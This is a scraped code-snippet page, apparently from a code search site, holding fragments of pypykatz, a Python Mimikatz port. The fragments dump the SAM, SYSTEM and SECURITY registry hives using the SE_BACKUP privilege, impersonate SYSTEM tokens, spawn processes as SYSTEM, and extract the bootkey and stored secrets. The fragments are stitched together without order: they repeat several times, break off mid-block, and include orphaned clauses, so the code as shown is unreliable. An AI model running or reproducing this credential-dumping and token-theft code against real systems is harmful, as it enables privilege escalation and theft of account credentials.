Secure your code as it's written. Use Snyk Code to scan source code in minutes - no build needed - and fix issues immediately.
#looking for the correct path...
cmdline = os.environ['ComSpec']
pm.create_process_for_sid(target_sid = sid, cmdline = cmdline, interactive = args.interactive)
return
elif args.module == 'token':
from pypykatz.commons.winapi.processmanipulator import ProcessManipulator
if args.cmd == 'list':
pm = ProcessManipulator()
for ti in pm.list_all_tokens(args.force):
print(str(ti))
return
if args.cmd == 'current':
pm = ProcessManipulator()
token_info = pm.get_current_token_info()
print(str(token_info))
return
elif args.module == 'users':
from pypykatz.commons.winapi.machine import LiveMachine
if args.cmd == 'list':
lm = LiveMachine()
users = lm.list_users()
for sid in users:
print(str(users[sid]))
elif args.cmd == 'whoami':
lm = LiveMachine()
user = lm.get_current_user()
logger.error('Could not import necessary packages! Are you on Windows? Error: %s' % str(e))
raise
sam_name = ntpath.join(tempfile.gettempdir(), os.urandom(4).hex())
system_name = ntpath.join(tempfile.gettempdir(), os.urandom(4).hex())
security_name = ntpath.join(tempfile.gettempdir(), os.urandom(4).hex())
locations = [
('SAM', sam_name),
('SYSTEM', system_name),
('SECURITY', security_name),
]
logger.debug('Obtaining SE_BACKUP privilege...')
try:
po = ProcessManipulator()
po.set_privilege(SE_BACKUP)
except Exception as e:
logger.error('Failed to obtain SE_BACKUP privilege! Registry dump will not work! Reason: %s' % str(e))
raise e
logger.debug('Obtaining SE_BACKUP OK!')
dumped_names = {}
for reg_name, location in locations:
logger.debug('Dumping %s...' % reg_name)
try:
key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, reg_name, access=0x00020000)
winreg.SaveKey(key, location)
key.Close()
except Exception as e:
logger.error('Dumping %s FAILED!! Reason: %s' % (reg_name, str(e)))
else:
logging.basicConfig(level=level)
##### Common obj
results = {}
files_with_error = []
for helper in cmdhelpers:
helper.execute(args)
###### Live
if args.command == 'live':
if args.module == 'process':
if args.cmd == 'create':
from pypykatz.commons.winapi.processmanipulator import ProcessManipulator
pm = ProcessManipulator()
sid = 'S-1-5-18'
if args.sid is not None:
sid = args.sid
if args.cmdline is not None:
cmdline = args.cmdline
else:
#looking for the correct path...
cmdline = os.environ['ComSpec']
pm.create_process_for_sid(target_sid = sid, cmdline = cmdline, interactive = args.interactive)
return
elif args.module == 'token':
from pypykatz.commons.winapi.processmanipulator import ProcessManipulator
if args.cmd == 'list':
def get_secrets(self):
"""
For obtaining all secrets from the registry on-the-fly, SYSTEM user MUST be used!
In case this is not achievable, Administrator can be used to first dump the registry hives to disk, then parse them offline
There is a 3rd way: As administrator you can obtain SE_TAKE_OWNERSHIP privileges, then you can open any hive with the WRITE_OWNER permission.
After doing that you'd need to change the SID of each target hive to include the administrator user with full access.
This is so intrusive I'm not implementing that, if you mess that up your computer will turn to potato. Like literally... (also it's a lot of work)
"""
pm = ProcessManipulator()
try:
#getting a SYSTEM token...
pm.assign_token_thread_sid()
except Exception as e:
logger.error('Failed to obtain SYSTEM prvis. On-the-fly parsing is not possible.')
raise e
else:
self.system = SYSTEM(self.system_hive)
bootkey = self.system.get_bootkey()
if self.sam_hive:
self.sam = SAM(self.sam_hive, bootkey)
self.sam.get_secrets()
if self.security_hive:
self.security = SECURITY(self.security_hive, bootkey)
"""
Creates a new process with the token of the target SID
TODO: implement non-interactive functionality :(
"""
for token in self.get_token_for_sid(target_sid = target_sid, dwDesiredAccess = TOKEN_ALL_ACCESS, ImpersonationLevel = SecurityImpersonation, TokenType = TokenImpersonation):
try:
self.api.advapi32.CreateProcessWithToken_manip(token, cmdline)
except Exception as e:
logger.log(1, 'Failed creating process with the token obtained. Reason: %s' % e)
continue
else:
logger.debug('[ProcessManipulator] Sucsessfully created process!')
break
if __name__ == '__main__':
pm = ProcessManipulator()
#pm.set_privilege(10)
#for ti in pm.list_all_tokens():
# print(str(ti))
#pm.create_process_for_sid()
#pm.assign_token_thread_sid()
ti = pm.get_current_token_info()
print(str(ti))
if args.sid is not None:
sid = args.sid
if args.cmdline is not None:
cmdline = args.cmdline
else:
#looking for the correct path...
cmdline = os.environ['ComSpec']
pm.create_process_for_sid(target_sid = sid, cmdline = cmdline, interactive = args.interactive)
return
elif args.module == 'token':
from pypykatz.commons.winapi.processmanipulator import ProcessManipulator
if args.cmd == 'list':
pm = ProcessManipulator()
for ti in pm.list_all_tokens(args.force):
print(str(ti))
return
if args.cmd == 'current':
pm = ProcessManipulator()
token_info = pm.get_current_token_info()
print(str(token_info))
return
elif args.module == 'users':
from pypykatz.commons.winapi.machine import LiveMachine
if args.cmd == 'list':
lm = LiveMachine()
users = lm.list_users()